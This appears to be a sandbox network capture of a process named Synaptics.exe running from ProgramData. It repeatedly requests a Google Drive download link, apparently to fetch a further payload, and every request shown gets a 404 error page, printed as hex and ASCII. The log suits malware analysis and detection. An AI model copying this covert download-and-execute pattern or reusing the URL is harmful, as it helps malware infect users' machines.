                                                                                                                                                                                        2022-05-17 11:32:00 UTC708OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC711INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:00 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iA4rQ050wQ+EPfB0xTV8/g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC712INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:00 UTC712INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 69 67 41 35 32 35 63 36 57 64 77 4c 68 31 74 69 32 5a 5a 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="figA525c6WdwLh1ti2ZZ2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:00 UTC714INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:00 UTC714INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        236192.168.2.350013142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:00 UTC711OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC714INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:00 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ytkwwP82nWIATFvk5+ewcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC716INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 44 4f 79 79 50 71 38 44 35 76 75 73 32 4d 2b 6d 61 68 76 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MDOyyPq8D5vus2M+mahvWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:00 UTC717INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:00 UTC717INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        237192.168.2.350016142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:00 UTC714OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:01 UTC717INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-/OKSLODRAhWQGjc2Ixr7Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:01 UTC719INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 37 6a 6f 6c 69 76 73 74 6c 37 2b 51 34 75 78 62 6c 33 78 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="47jolivstl7+Q4uxbl3xXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:01 UTC720INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:01 UTC720INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        238192.168.2.350018142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:00 UTC717OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:01 UTC721INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1c4uCgWysrvLa0iFsWTJ5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:01 UTC722INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 69 75 35 53 58 57 4f 50 34 53 35 33 70 77 47 62 75 37 66 56 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xiu5SXWOP4S53pwGbu7fVA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:01 UTC723INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:01 UTC724INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        239192.168.2.350019142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:01 UTC720OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:01 UTC724INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:01 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-doj8trddkZGSD8ilZZSx9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:01 UTC725INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:01 UTC725INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 52 42 79 44 71 4e 46 66 37 48 43 70 62 52 7a 5a 75 75 4c 30 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LRByDqNFf7HCpbRzZuuL0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:01 UTC726INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:01 UTC726INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        24192.168.2.349762142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC72OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:32 UTC75INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:32 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-CquuWTGYRmBtGWpxWmX7fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
